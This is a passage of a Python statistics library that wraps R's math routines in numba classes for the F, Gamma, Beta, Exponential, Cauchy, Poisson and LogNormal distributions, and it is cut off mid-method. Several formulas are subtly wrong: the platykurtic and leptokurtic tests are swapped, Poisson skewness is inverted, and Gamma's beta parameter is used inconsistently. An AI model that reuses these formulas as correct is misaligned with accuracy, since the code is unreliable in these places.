return sum(lognormal_logpdf(self.mu, self.sigma, x))
def cdf(self, x):
"""The cdf value(s) evaluated at x."""
return lognormal_cdf(self.mu, self.sigma, x)
def ccdf(self, x):
"""The complementary cdf evaluated at x, i.e. 1 - cdf(x)."""
return lognormal_ccdf(self.mu, self.sigma, x)
def logcdf(self, x):
"""The logarithm of the cdf value(s) evaluated at x."""
return lognormal_logcdf(self.mu, self.sigma, x)
def logccdf(self, x):
"""The logarithm of the complementary cdf evaluated at x."""
return lognormal_logccdf(self.mu, self.sigma, x)
def quantile(self, q):
"""The quantile value evaluated at q."""
return lognormal_invcdf(self.mu, self.sigma, q)
def cquantile(self, q):
"""The complementary quantile value evaluated at q."""
return lognormal_invccdf(self.mu, self.sigma, q)
def invlogcdf(self, lq):
"""The inverse function of the logcdf."""
return lognormal_invlogcdf(self.mu, self.sigma, lq)
def invlogccdf(self, lq):
"""The inverse function of the logccdf."""
return lognormal_invlogccdf(self.mu, self.sigma, lq)
# ========
# Sampling
# ========
def rand(self, n):
"""Generates a vector of n independent samples from the distribution."""
out = np.empty(n)
for i, _ in np.ndenumerate(out):
out[i] = lognormal_rand(self.mu, self.sigma)
return out
# ============================= NEW DISTRIBUTION =================================
df = _rmath_ffi.lib.df
pf = _rmath_ffi.lib.pf
qf = _rmath_ffi.lib.qf
@vectorize(nopython=True)
def fdist_pdf(v1, v2, x):
return df(x, v1, v2, 0)
@vectorize(nopython=True)
def fdist_logpdf(v1, v2, x):
return df(x, v1, v2, 1)
@vectorize(nopython=True)
def fdist_cdf(v1, v2, x):
return pf(x, v1, v2, 1, 0)
@vectorize(nopython=True)
def fdist_ccdf(v1, v2, x):
return pf(x, v1, v2, 0, 0)
@vectorize(nopython=True)
def fdist_logcdf(v1, v2, x):
return pf(x, v1, v2, 1, 1)
@vectorize(nopython=True)
def fdist_logccdf(v1, v2, x):
return pf(x, v1, v2, 0, 1)
@vectorize(nopython=True)
def fdist_invcdf(v1, v2, q):
return qf(q, v1, v2, 1, 0)
@vectorize(nopython=True)
def fdist_invccdf(v1, v2, q):
return qf(q, v1, v2, 0, 0)
@vectorize(nopython=True)
def fdist_invlogcdf(v1, v2, lq):
return qf(lq, v1, v2, 1, 1)
@vectorize(nopython=True)
def fdist_invlogccdf(v1, v2, lq):
return qf(lq, v1, v2, 0, 1)
rf = _rmath_ffi.lib.rf
@jit(nopython=True)
def fdist_rand(v1, v2):
return rf(v1, v2)
@vectorize(nopython=True)
def fdist_mgf(v1, v2, x):
return None
@vectorize(nopython=True)
def fdist_cf(v1, v2, x):
return None
# -------------
# F
# -------------
spec = [
('v1', float32), ('v2', float32)
]
@jitclass(spec)
class F():
# set docstring
__doc__ = _create_class_docstr(**mtdt['F'])
def __init__(self, v1, v2):
self.v1, self.v2 = v1, v2
def __str__(self):
return "F(d1=%.5f, d2=%.5f)" %(self.params)
def __repr__(self):
return self.__str__()
# ===================
# Parameter retrieval
# ===================
@property
def params(self):
"""Return a tuple of parameters."""
return (self.v1, self.v2)
@property
def location(self):
"""Return location parameter if exists."""
return None
@property
def scale(self):
"""Return scale parameter if exists."""
return None
@property
def shape(self):
"""Return shape parameter if exists."""
return (self.v1, self.v2)
# ==========
# Statistics
# ==========
@property
def mean(self):
"""Return the mean."""
return self.v2/(self.v2 - 2) if self.v2 > 2 else np.inf
@property
def median(self):
"""Return the median."""
return None
@property
def mode(self):
"""Return the mode."""
return (self.v1 - 2)/self.v1 * self.v2/(self.v2 + 2) if self.v1 > 2 else np.inf
@property
def var(self):
"""Return the variance."""
return 2*self.v2**2*(self.v1 + self.v2 - 2)/ (self.v1*(self.v2 - 2)**2*(self.v2 - 4)) if self.v2 > 4 else np.inf
@property
def std(self):
"""Return the standard deviation."""
return np.sqrt(self.var)
@property
def skewness(self):
"""Return the skewness."""
return (2*self.v1 + self.v2 - 2)*np.sqrt(8*(self.v2 - 4))/ ((self.v2 - 6)*np.sqrt(self.v1*(self.v1+self.v2-2))) if self.v2 > 6 else np.inf
@property
def kurtosis(self):
"""Return the kurtosis."""
return 3 + 12*(self.v1*(5*self.v2 - 22)*(self.v1+self.v2-2) + (self.v2 - 4)*(self.v2 - 2)**2)/ (self.v1*(self.v2-6)*(self.v2-8)*(self.v1+self.v2-2))
@property
def isplatykurtic(self):
"""Kurtosis being greater than zero."""
return self.kurtosis > 0
@property
def isleptokurtic(self):
"""Kurtosis being smaller than zero."""
return self.kurtosis < 0
@property
def ismesokurtic(self):
"""Kurtosis being equal to zero."""
return self.kurtosis == 0.0
@property
def entropy(self):
"""Return the entropy."""
return None
def mgf(self, x):
"""Evaluate the moment generating function at x."""
return fdist_mgf(self.v1, self.v2, x)
def cf(self, x):
"""Evaluate the characteristic function at x."""
return fdist_cf(self.v1, self.v2, x)
# ==========
# Evaluation
# ==========
def insupport(self, x):
"""When x is a scalar, return whether x is within
the support of the distribution. When x is an array,
return whether every element of x is within
the support of the distribution."""
return 0 <= x < np.inf
def pdf(self, x):
"""The pdf value(s) evaluated at x."""
return fdist_pdf(self.v1, self.v2, x)
def logpdf(self, x):
"""The logarithm of the pdf value(s) evaluated at x."""
return fdist_logpdf(self.v1, self.v2, x)
def loglikelihood(self, x):
"""The log-likelihood of the distribution w.r.t. all
samples contained in array x."""
return sum(fdist_logpdf(self.v1, self.v2, x))
def cdf(self, x):
"""The cdf value(s) evaluated at x."""
return fdist_cdf(self.v1, self.v2, x)
def ccdf(self, x):
"""The complementary cdf evaluated at x, i.e. 1 - cdf(x)."""
return fdist_ccdf(self.v1, self.v2, x)
def logcdf(self, x):
"""The logarithm of the cdf value(s) evaluated at x."""
return fdist_logcdf(self.v1, self.v2, x)
def logccdf(self, x):
"""The logarithm of the complementary cdf evaluated at x."""
return fdist_logccdf(self.v1, self.v2, x)
def quantile(self, q):
"""The quantile value evaluated at q."""
return fdist_invcdf(self.v1, self.v2, q)
def cquantile(self, q):
"""The complementary quantile value evaluated at q."""
return fdist_invccdf(self.v1, self.v2, q)
def invlogcdf(self, lq):
"""The inverse function of the logcdf."""
return fdist_invlogcdf(self.v1, self.v2, lq)
def invlogccdf(self, lq):
"""The inverse function of the logccdf."""
return fdist_invlogccdf(self.v1, self.v2, lq)
# ========
# Sampling
# ========
def rand(self, n):
"""Generates a vector of n independent samples from the distribution."""
out = np.empty(n)
for i, _ in np.ndenumerate(out):
out[i] = fdist_rand(self.v1, self.v2)
return out
# ============================= NEW DISTRIBUTION =================================
dgamma = _rmath_ffi.lib.dgamma
pgamma = _rmath_ffi.lib.pgamma
qgamma = _rmath_ffi.lib.qgamma
@vectorize(nopython=True)
def gamma_pdf(alpha, beta, x):
return dgamma(x, alpha, beta, 0)
@vectorize(nopython=True)
def gamma_logpdf(alpha, beta, x):
return dgamma(x, alpha, beta, 1)
@vectorize(nopython=True)
def gamma_cdf(alpha, beta, x):
return pgamma(x, alpha, beta, 1, 0)
@vectorize(nopython=True)
def gamma_ccdf(alpha, beta, x):
return pgamma(x, alpha, beta, 0, 0)
@vectorize(nopython=True)
def gamma_logcdf(alpha, beta, x):
return pgamma(x, alpha, beta, 1, 1)
@vectorize(nopython=True)
def gamma_logccdf(alpha, beta, x):
return pgamma(x, alpha, beta, 0, 1)
@vectorize(nopython=True)
def gamma_invcdf(alpha, beta, q):
return qgamma(q, alpha, beta, 1, 0)
@vectorize(nopython=True)
def gamma_invccdf(alpha, beta, q):
return qgamma(q, alpha, beta, 0, 0)
@vectorize(nopython=True)
def gamma_invlogcdf(alpha, beta, lq):
return qgamma(lq, alpha, beta, 1, 1)
@vectorize(nopython=True)
def gamma_invlogccdf(alpha, beta, lq):
return qgamma(lq, alpha, beta, 0, 1)
rgamma = _rmath_ffi.lib.rgamma
@jit(nopython=True)
def gamma_rand(alpha, beta):
return rgamma(alpha, beta)
@vectorize(nopython=True)
def gamma_mgf(alpha, beta, x):
return (1 - x/beta)**(-alpha) if x < beta else None
@vectorize(nopython=True)
def gamma_cf(alpha, beta, x):
return (1 - (1j * x)/beta)**(-alpha)
# -------------
# Gamma
# -------------
spec = [
('alpha', float32), ('beta', float32)
]
@jitclass(spec)
class Gamma():
# set docstring
__doc__ = _create_class_docstr(**mtdt['Gamma'])
def __init__(self, alpha, beta):
self.alpha, self.beta = alpha, beta
def __str__(self):
return "Gamma(alpha=%.5f, beta=%.5f)" %(self.params)
def __repr__(self):
return self.__str__()
# ===================
# Parameter retrieval
# ===================
@property
def params(self):
"""Return a tuple of parameters."""
return (self.alpha, self.beta)
@property
def location(self):
"""Return location parameter if exists."""
return None
@property
def scale(self):
"""Return scale parameter if exists."""
return self.beta
@property
def shape(self):
"""Return shape parameter if exists."""
return self.alpha
# ==========
# Statistics
# ==========
@property
def mean(self):
"""Return the mean."""
return self.alpha*self.beta
@property
def median(self):
"""Return the median."""
return None
@property
def mode(self):
"""Return the mode."""
return (self.alpha - 1) * self.beta if self.alpha >= 1 else None
@property
def var(self):
"""Return the variance."""
return self.alpha * (self.beta**2)
@property
def std(self):
"""Return the standard deviation."""
return np.sqrt(self.var)
@property
def skewness(self):
"""Return the skewness."""
return 2/(np.sqrt(self.alpha))
@property
def kurtosis(self):
"""Return the kurtosis."""
return 3 + 6/self.alpha
@property
def isplatykurtic(self):
"""Kurtosis being greater than zero."""
return self.kurtosis > 0
@property
def isleptokurtic(self):
"""Kurtosis being smaller than zero."""
return self.kurtosis < 0
@property
def ismesokurtic(self):
"""Kurtosis being equal to zero."""
return self.kurtosis == 0.0
@property
def entropy(self):
"""Return the entropy."""
return self.alpha - np.log(self.beta) + np.log(gamma(self.alpha)) + (1 - self.alpha)*digamma(self.alpha)
def mgf(self, x):
"""Evaluate the moment generating function at x."""
return gamma_mgf(self.alpha, self.beta, x)
def cf(self, x):
"""Evaluate the characteristic function at x."""
return gamma_cf(self.alpha, self.beta, x)
# ==========
# Evaluation
# ==========
def insupport(self, x):
"""When x is a scalar, return whether x is within
the support of the distribution. When x is an array,
return whether every element of x is within
the support of the distribution."""
return 0 < x < np.inf
def pdf(self, x):
"""The pdf value(s) evaluated at x."""
return gamma_pdf(self.alpha, self.beta, x)
def logpdf(self, x):
"""The logarithm of the pdf value(s) evaluated at x."""
return gamma_logpdf(self.alpha, self.beta, x)
def loglikelihood(self, x):
"""The log-likelihood of the distribution w.r.t. all
samples contained in array x."""
return sum(gamma_logpdf(self.alpha, self.beta, x))
def cdf(self, x):
"""The cdf value(s) evaluated at x."""
return gamma_cdf(self.alpha, self.beta, x)
def ccdf(self, x):
"""The complementary cdf evaluated at x, i.e. 1 - cdf(x)."""
return gamma_ccdf(self.alpha, self.beta, x)
def logcdf(self, x):
"""The logarithm of the cdf value(s) evaluated at x."""
return gamma_logcdf(self.alpha, self.beta, x)
def logccdf(self, x):
"""The logarithm of the complementary cdf evaluated at x."""
return gamma_logccdf(self.alpha, self.beta, x)
def quantile(self, q):
"""The quantile value evaluated at q."""
return gamma_invcdf(self.alpha, self.beta, q)
def cquantile(self, q):
"""The complementary quantile value evaluated at q."""
return gamma_invccdf(self.alpha, self.beta, q)
def invlogcdf(self, lq):
"""The inverse function of the logcdf."""
return gamma_invlogcdf(self.alpha, self.beta, lq)
def invlogccdf(self, lq):
"""The inverse function of the logccdf."""
return gamma_invlogccdf(self.alpha, self.beta, lq)
# ========
# Sampling
# ========
def rand(self, n):
"""Generates a vector of n independent samples from the distribution."""
out = np.empty(n)
for i, _ in np.ndenumerate(out):
out[i] = gamma_rand(self.alpha, self.beta)
return out
# ============================= NEW DISTRIBUTION =================================
dbeta = _rmath_ffi.lib.dbeta
pbeta = _rmath_ffi.lib.pbeta
qbeta = _rmath_ffi.lib.qbeta
@vectorize(nopython=True)
def beta_pdf(alpha, beta, x):
return dbeta(x, alpha, beta, 0)
@vectorize(nopython=True)
def beta_logpdf(alpha, beta, x):
return dbeta(x, alpha, beta, 1)
@vectorize(nopython=True)
def beta_cdf(alpha, beta, x):
return pbeta(x, alpha, beta, 1, 0)
@vectorize(nopython=True)
def beta_ccdf(alpha, beta, x):
return pbeta(x, alpha, beta, 0, 0)
@vectorize(nopython=True)
def beta_logcdf(alpha, beta, x):
return pbeta(x, alpha, beta, 1, 1)
@vectorize(nopython=True)
def beta_logccdf(alpha, beta, x):
return pbeta(x, alpha, beta, 0, 1)
@vectorize(nopython=True)
def beta_invcdf(alpha, beta, q):
return qbeta(q, alpha, beta, 1, 0)
@vectorize(nopython=True)
def beta_invccdf(alpha, beta, q):
return qbeta(q, alpha, beta, 0, 0)
@vectorize(nopython=True)
def beta_invlogcdf(alpha, beta, lq):
return qbeta(lq, alpha, beta, 1, 1)
@vectorize(nopython=True)
def beta_invlogccdf(alpha, beta, lq):
return qbeta(lq, alpha, beta, 0, 1)
rbeta = _rmath_ffi.lib.rbeta
@jit(nopython=True)
def beta_rand(alpha, beta):
return rbeta(alpha, beta)
@vectorize(nopython=True)
def beta_mgf(alpha, beta, x):
return None
@vectorize(nopython=True)
def beta_cf(alpha, beta, x):
return None
# -------------
# Beta
# -------------
spec = [
('alpha', float32), ('beta', float32)
]
@jitclass(spec)
class Beta():
# set docstring
__doc__ = _create_class_docstr(**mtdt['Beta'])
def __init__(self, alpha, beta):
self.alpha, self.beta = alpha, beta
def __str__(self):
return "Beta(alpha=%.5f, beta=%.5f)" %(self.params)
def __repr__(self):
return self.__str__()
# ===================
# Parameter retrieval
# ===================
@property
def params(self):
"""Return a tuple of parameters."""
return (self.alpha, self.beta)
@property
def location(self):
"""Return location parameter if exists."""
return None
@property
def scale(self):
"""Return scale parameter if exists."""
return None
@property
def shape(self):
"""Return shape parameter if exists."""
return (self.alpha, self.beta)
# ==========
# Statistics
# ==========
@property
def mean(self):
"""Return the mean."""
return self.alpha/(self.alpha + self.beta)
@property
def median(self):
"""Return the median."""
return (self.alpha - 1/3)/(self.alpha + self.beta - 2/3) if self.alpha >=1 and self.beta >= 1 else None
@property
def mode(self):
"""Return the mode."""
return (self.alpha - 1)/(self.alpha + self.beta - 2) if self.alpha > 1 and self.beta > 1 else None
@property
def var(self):
"""Return the variance."""
return (self.alpha * self.beta)/ ((self.alpha + self.beta)**2 * (self.alpha + self.beta + 1))
@property
def std(self):
"""Return the standard deviation."""
return np.sqrt(self.var)
@property
def skewness(self):
"""Return the skewness."""
return 2 * (self.beta - self.alpha) * np.sqrt(self.alpha + self.beta + 1)/ ((self.alpha + self.beta + 2) * np.sqrt(self.alpha * self.beta))
@property
def kurtosis(self):
"""Return the kurtosis."""
return 3 + 6 * ((self.alpha - self.beta)**2*(self.alpha + self.beta + 1) - self.alpha * self.beta * (self.alpha + self.beta + 2) )/ (self.alpha * self.beta * (self.alpha + self.beta + 2) * (self.alpha + self.beta + 3))
@property
def isplatykurtic(self):
"""Kurtosis being greater than zero."""
return self.kurtosis > 0
@property
def isleptokurtic(self):
"""Kurtosis being smaller than zero."""
return self.kurtosis < 0
@property
def ismesokurtic(self):
"""Kurtosis being equal to zero."""
return self.kurtosis == 0.0
@property
def entropy(self):
"""Return the entropy."""
return np.log(beta(self.alpha, self.beta)) - (self.alpha - 1)* digamma(self.alpha) - (self.beta - 1)*digamma(self.beta) + (self.alpha + self.beta - 2)*digamma(self.alpha + self.beta)
def mgf(self, x):
"""Evaluate the moment generating function at x."""
return beta_mgf(self.alpha, self.beta, x)
def cf(self, x):
"""Evaluate the characteristic function at x."""
return beta_cf(self.alpha, self.beta, x)
# ==========
# Evaluation
# ==========
def insupport(self, x):
"""When x is a scalar, return whether x is within
the support of the distribution. When x is an array,
return whether every element of x is within
the support of the distribution."""
return 0 < x < 1
def pdf(self, x):
"""The pdf value(s) evaluated at x."""
return beta_pdf(self.alpha, self.beta, x)
def logpdf(self, x):
"""The logarithm of the pdf value(s) evaluated at x."""
return beta_logpdf(self.alpha, self.beta, x)
def loglikelihood(self, x):
"""The log-likelihood of the distribution w.r.t. all
samples contained in array x."""
return sum(beta_logpdf(self.alpha, self.beta, x))
def cdf(self, x):
"""The cdf value(s) evaluated at x."""
return beta_cdf(self.alpha, self.beta, x)
def ccdf(self, x):
"""The complementary cdf evaluated at x, i.e. 1 - cdf(x)."""
return beta_ccdf(self.alpha, self.beta, x)
def logcdf(self, x):
"""The logarithm of the cdf value(s) evaluated at x."""
return beta_logcdf(self.alpha, self.beta, x)
def logccdf(self, x):
"""The logarithm of the complementary cdf evaluated at x."""
return beta_logccdf(self.alpha, self.beta, x)
def quantile(self, q):
"""The quantile value evaluated at q."""
return beta_invcdf(self.alpha, self.beta, q)
def cquantile(self, q):
"""The complementary quantile value evaluated at q."""
return beta_invccdf(self.alpha, self.beta, q)
def invlogcdf(self, lq):
"""The inverse function of the logcdf."""
return beta_invlogcdf(self.alpha, self.beta, lq)
def invlogccdf(self, lq):
"""The inverse function of the logccdf."""
return beta_invlogccdf(self.alpha, self.beta, lq)
# ========
# Sampling
# ========
def rand(self, n):
"""Generates a vector of n independent samples from the distribution."""
out = np.empty(n)
for i, _ in np.ndenumerate(out):
out[i] = beta_rand(self.alpha, self.beta)
return out
# ============================= NEW DISTRIBUTION =================================
dexp = _rmath_ffi.lib.dexp
pexp = _rmath_ffi.lib.pexp
qexp = _rmath_ffi.lib.qexp
@vectorize(nopython=True)
def exp_pdf(theta, x):
return dexp(x, theta, 0)
@vectorize(nopython=True)
def exp_logpdf(theta, x):
return dexp(x, theta, 1)
@vectorize(nopython=True)
def exp_cdf(theta, x):
return pexp(x, theta, 1, 0)
@vectorize(nopython=True)
def exp_ccdf(theta, x):
return pexp(x, theta, 0, 0)
@vectorize(nopython=True)
def exp_logcdf(theta, x):
return pexp(x, theta, 1, 1)
@vectorize(nopython=True)
def exp_logccdf(theta, x):
return pexp(x, theta, 0, 1)
@vectorize(nopython=True)
def exp_invcdf(theta, q):
return qexp(q, theta, 1, 0)
@vectorize(nopython=True)
def exp_invccdf(theta, q):
return qexp(q, theta, 0, 0)
@vectorize(nopython=True)
def exp_invlogcdf(theta, lq):
return qexp(lq, theta, 1, 1)
@vectorize(nopython=True)
def exp_invlogccdf(theta, lq):
return qexp(lq, theta, 0, 1)
rexp = _rmath_ffi.lib.rexp
@jit(nopython=True)
def exp_rand(theta):
return rexp(theta)
@vectorize(nopython=True)
def exp_mgf(theta, x):
return theta/(theta - x) if x < theta else None
@vectorize(nopython=True)
def exp_cf(theta, x):
return theta/(theta - 1j*x)
# -------------
# Exponential
# -------------
spec = [
('theta', float32)
]
@jitclass(spec)
class Exponential():
# set docstring
__doc__ = _create_class_docstr(**mtdt['Exponential'])
def __init__(self, theta):
self.theta = theta
def __str__(self):
return "Exponential(theta=%.5f)" %(self.params)
def __repr__(self):
return self.__str__()
# ===================
# Parameter retrieval
# ===================
@property
def params(self):
"""Return a tuple of parameters."""
return (self.theta)
@property
def location(self):
"""Return location parameter if exists."""
return None
@property
def scale(self):
"""Return scale parameter if exists."""
return 1/self.theta
@property
def shape(self):
"""Return shape parameter if exists."""
return None
# ==========
# Statistics
# ==========
@property
def mean(self):
"""Return the mean."""
return 1/self.theta
@property
def median(self):
"""Return the median."""
return 1/self.theta * np.log(2)
@property
def mode(self):
"""Return the mode."""
return 0
@property
def var(self):
"""Return the variance."""
return self.theta**(-2)
@property
def std(self):
"""Return the standard deviation."""
return np.sqrt(self.var)
@property
def skewness(self):
"""Return the skewness."""
return 2
@property
def kurtosis(self):
"""Return the kurtosis."""
return 9
@property
def isplatykurtic(self):
"""Kurtosis being greater than zero."""
return self.kurtosis > 0
@property
def isleptokurtic(self):
"""Kurtosis being smaller than zero."""
return self.kurtosis < 0
@property
def ismesokurtic(self):
"""Kurtosis being equal to zero."""
return self.kurtosis == 0.0
@property
def entropy(self):
"""Return the entropy."""
return 1 - np.log(self.theta)
def mgf(self, x):
"""Evaluate the moment generating function at x."""
return exp_mgf(self.theta, x)
def cf(self, x):
"""Evaluate the characteristic function at x."""
return exp_cf(self.theta, x)
# ==========
# Evaluation
# ==========
def insupport(self, x):
"""When x is a scalar, return whether x is within
the support of the distribution. When x is an array,
return whether every element of x is within
the support of the distribution."""
return 0 <= x < np.inf
def pdf(self, x):
"""The pdf value(s) evaluated at x."""
return exp_pdf(self.theta, x)
def logpdf(self, x):
"""The logarithm of the pdf value(s) evaluated at x."""
return exp_logpdf(self.theta, x)
def loglikelihood(self, x):
"""The log-likelihood of the distribution w.r.t. all
samples contained in array x."""
return sum(exp_logpdf(self.theta, x))
def cdf(self, x):
"""The cdf value(s) evaluated at x."""
return exp_cdf(self.theta, x)
def ccdf(self, x):
"""The complementary cdf evaluated at x, i.e. 1 - cdf(x)."""
return exp_ccdf(self.theta, x)
def logcdf(self, x):
"""The logarithm of the cdf value(s) evaluated at x."""
return exp_logcdf(self.theta, x)
def logccdf(self, x):
"""The logarithm of the complementary cdf evaluated at x."""
return exp_logccdf(self.theta, x)
def quantile(self, q):
"""The quantile value evaluated at q."""
return exp_invcdf(self.theta, q)
def cquantile(self, q):
"""The complementary quantile value evaluated at q."""
return exp_invccdf(self.theta, q)
def invlogcdf(self, lq):
"""The inverse function of the logcdf."""
return exp_invlogcdf(self.theta, lq)
def invlogccdf(self, lq):
"""The inverse function of the logccdf."""
return exp_invlogccdf(self.theta, lq)
# ========
# Sampling
# ========
def rand(self, n):
"""Generates a vector of n independent samples from the distribution."""
out = np.empty(n)
for i, _ in np.ndenumerate(out):
out[i] = exp_rand(self.theta)
return out
# ============================= NEW DISTRIBUTION =================================
dcauchy = _rmath_ffi.lib.dcauchy
pcauchy = _rmath_ffi.lib.pcauchy
qcauchy = _rmath_ffi.lib.qcauchy
@vectorize(nopython=True)
def cauchy_pdf(mu, sigma, x):
return dcauchy(x, mu, sigma, 0)
@vectorize(nopython=True)
def cauchy_logpdf(mu, sigma, x):
return dcauchy(x, mu, sigma, 1)
@vectorize(nopython=True)
def cauchy_cdf(mu, sigma, x):
return pcauchy(x, mu, sigma, 1, 0)
@vectorize(nopython=True)
def cauchy_ccdf(mu, sigma, x):
return pcauchy(x, mu, sigma, 0, 0)
@vectorize(nopython=True)
def cauchy_logcdf(mu, sigma, x):
return pcauchy(x, mu, sigma, 1, 1)
@vectorize(nopython=True)
def cauchy_logccdf(mu, sigma, x):
return pcauchy(x, mu, sigma, 0, 1)
@vectorize(nopython=True)
def cauchy_invcdf(mu, sigma, q):
return qcauchy(q, mu, sigma, 1, 0)
@vectorize(nopython=True)
def cauchy_invccdf(mu, sigma, q):
return qcauchy(q, mu, sigma, 0, 0)
@vectorize(nopython=True)
def cauchy_invlogcdf(mu, sigma, lq):
return qcauchy(lq, mu, sigma, 1, 1)
@vectorize(nopython=True)
def cauchy_invlogccdf(mu, sigma, lq):
return qcauchy(lq, mu, sigma, 0, 1)
rcauchy = _rmath_ffi.lib.rcauchy
@jit(nopython=True)
def cauchy_rand(mu, sigma):
return rcauchy(mu, sigma)
@vectorize(nopython=True)
def cauchy_mgf(mu, sigma, x):
return None
@vectorize(nopython=True)
def cauchy_cf(mu, sigma, x):
return np.exp(mu*1j*x - sigma*np.abs(x))
# -------------
# Cauchy
# -------------
spec = [
('mu', float32), ('sigma', float32)
]
@jitclass(spec)
class Cauchy():
# set docstring
__doc__ = _create_class_docstr(**mtdt['Cauchy'])
def __init__(self, mu, sigma):
self.mu, self.sigma = mu, sigma
def __str__(self):
return "Cauchy(mu=%.5f, sigma=%.5f)" %(self.params)
def __repr__(self):
return self.__str__()
# ===================
# Parameter retrieval
# ===================
@property
def params(self):
"""Return a tuple of parameters."""
return (self.mu, self.sigma)
@property
def location(self):
"""Return location parameter if exists."""
return self.mu
@property
def scale(self):
"""Return scale parameter if exists."""
return self.sigma
@property
def shape(self):
"""Return shape parameter if exists."""
return None
# ==========
# Statistics
# ==========
@property
def mean(self):
"""Return the mean."""
return None
@property
def median(self):
"""Return the median."""
return self.mu
@property
def mode(self):
"""Return the mode."""
return self.mu
@property
def var(self):
"""Return the variance."""
return None
@property
def std(self):
"""Return the standard deviation."""
return None
@property
def skewness(self):
"""Return the skewness."""
return None
@property
def kurtosis(self):
"""Return the kurtosis."""
return 0
@property
def isplatykurtic(self):
"""Kurtosis being greater than zero."""
return self.kurtosis > 0
@property
def isleptokurtic(self):
"""Kurtosis being smaller than zero."""
return self.kurtosis < 0
@property
def ismesokurtic(self):
"""Kurtosis being equal to zero."""
return self.kurtosis == 0.0
@property
def entropy(self):
"""Return the entropy."""
return np.log(self.sigma) + np.log(4*np.pi)
def mgf(self, x):
"""Evaluate the moment generating function at x."""
return cauchy_mgf(self.mu, self.sigma, x)
def cf(self, x):
"""Evaluate the characteristic function at x."""
return cauchy_cf(self.mu, self.sigma, x)
# ==========
# Evaluation
# ==========
def insupport(self, x):
"""When x is a scalar, return whether x is within
the support of the distribution. When x is an array,
return whether every element of x is within
the support of the distribution."""
return -np.inf < x < np.inf
def pdf(self, x):
"""The pdf value(s) evaluated at x."""
return cauchy_pdf(self.mu, self.sigma, x)
def logpdf(self, x):
"""The logarithm of the pdf value(s) evaluated at x."""
return cauchy_logpdf(self.mu, self.sigma, x)
def loglikelihood(self, x):
"""The log-likelihood of the distribution w.r.t. all
samples contained in array x."""
return sum(cauchy_logpdf(self.mu, self.sigma, x))
def cdf(self, x):
"""The cdf value(s) evaluated at x."""
return cauchy_cdf(self.mu, self.sigma, x)
def ccdf(self, x):
"""The complementary cdf evaluated at x, i.e. 1 - cdf(x)."""
return cauchy_ccdf(self.mu, self.sigma, x)
def logcdf(self, x):
"""The logarithm of the cdf value(s) evaluated at x."""
return cauchy_logcdf(self.mu, self.sigma, x)
def logccdf(self, x):
"""The logarithm of the complementary cdf evaluated at x."""
return cauchy_logccdf(self.mu, self.sigma, x)
def quantile(self, q):
"""The quantile value evaluated at q."""
return cauchy_invcdf(self.mu, self.sigma, q)
def cquantile(self, q):
"""The complementary quantile value evaluated at q."""
return cauchy_invccdf(self.mu, self.sigma, q)
def invlogcdf(self, lq):
"""The inverse function of the logcdf."""
return cauchy_invlogcdf(self.mu, self.sigma, lq)
def invlogccdf(self, lq):
"""The inverse function of the logccdf."""
return cauchy_invlogccdf(self.mu, self.sigma, lq)
# ========
# Sampling
# ========
def rand(self, n):
"""Generates a vector of n independent samples from the distribution."""
out = np.empty(n)
for i, _ in np.ndenumerate(out):
out[i] = cauchy_rand(self.mu, self.sigma)
return out
# ============================= NEW DISTRIBUTION =================================
dpois = _rmath_ffi.lib.dpois
ppois = _rmath_ffi.lib.ppois
qpois = _rmath_ffi.lib.qpois
@vectorize(nopython=True)
def pois_pdf(mu, x):
return dpois(x, mu, 0)
@vectorize(nopython=True)
def pois_logpdf(mu, x):
return dpois(x, mu, 1)
@vectorize(nopython=True)
def pois_cdf(mu, x):
return ppois(x, mu, 1, 0)
@vectorize(nopython=True)
def pois_ccdf(mu, x):
return ppois(x, mu, 0, 0)
@vectorize(nopython=True)
def pois_logcdf(mu, x):
return ppois(x, mu, 1, 1)
@vectorize(nopython=True)
def pois_logccdf(mu, x):
return ppois(x, mu, 0, 1)
@vectorize(nopython=True)
def pois_invcdf(mu, q):
return qpois(q, mu, 1, 0)
@vectorize(nopython=True)
def pois_invccdf(mu, q):
return qpois(q, mu, 0, 0)
@vectorize(nopython=True)
def pois_invlogcdf(mu, lq):
return qpois(lq, mu, 1, 1)
@vectorize(nopython=True)
def pois_invlogccdf(mu, lq):
return qpois(lq, mu, 0, 1)
rpois = _rmath_ffi.lib.rpois
@jit(nopython=True)
def pois_rand(mu):
return rpois(mu)
@vectorize(nopython=True)
def pois_mgf(mu, x):
return np.exp(mu*(np.exp(x) - 1))
@vectorize(nopython=True)
def pois_cf(mu, x):
return np.exp(mu*(np.exp(1j*x) - 1))
# -------------
# Poisson
# -------------
spec = [
('mu', float32)
]
@jitclass(spec)
class Poisson():
# set docstring
__doc__ = _create_class_docstr(**mtdt['Poisson'])
def __init__(self, mu):
self.mu = mu
def __str__(self):
return "Poisson(mu=%.5f)" %(self.params)
def __repr__(self):
return self.__str__()
# ===================
# Parameter retrieval
# ===================
@property
def params(self):
"""Return a tuple of parameters."""
return (self.mu)
@property
def location(self):
"""Return location parameter if exists."""
return None
@property
def scale(self):
"""Return scale parameter if exists."""
return None
@property
def shape(self):
"""Return shape parameter if exists."""
return self.mu
# ==========
# Statistics
# ==========
@property
def mean(self):
"""Return the mean."""
return self.mu
@property
def median(self):
"""Return the median."""
return np.floor(self.mu + 1/3 - 0.02/self.mu)
@property
def mode(self):
"""Return the mode."""
return (np.ceil(self.mu) - 1, np.floor(self.mu))
@property
def var(self):
"""Return the variance."""
return self.mu
@property
def std(self):
"""Return the standard deviation."""
return np.sqrt(self.var)
@property
def skewness(self):
"""Return the skewness."""
return self.mu**(.5)
@property
def kurtosis(self):
"""Return the kurtosis."""
return 1/self.mu
@property
def isplatykurtic(self):
"""Kurtosis being greater than zero."""
return self.kurtosis > 0
@property
def isleptokurtic(self):
"""Kurtosis being smaller than zero."""
return self.kurtosis < 0
@property
def ismesokurtic(self):
"""Kurtosis being equal to zero."""
return self.kurtosis == 0.0
@property
def entropy(self):
"""Return the entropy."""
return .5*np.log(2*np.pi*np.e*self.mu) - 1/(12*self.mu) - 1/(24*self.mu**2) - 19/(360*self.mu**3)
def mgf(self, x):
"""Evaluate the moment generating function at x."""
return pois_mgf(self.mu, x)
def cf(self, x):
"""Evaluate the characteristic function at x."""
return pois_cf(self.mu, x)
# ==========
# Evaluation
# ==========
def insupport(self, x):
"""When x is a scalar, return whether x is within
the support of the distribution. When x is an array,
return whether every element of x is within
the support of the distribution."""
return isinstance(x, int)
def pdf(self, x):
"""The pdf value(s) evaluated at x."""
return pois_pdf(self.mu, x)
def logpdf(self, x):
"""The logarithm of the pdf value(s) evaluated at x."""
return pois_logpdf(self.mu, x)
def loglikelihood(self, x):
"""The log-likelihood of the distribution w.r.t. all
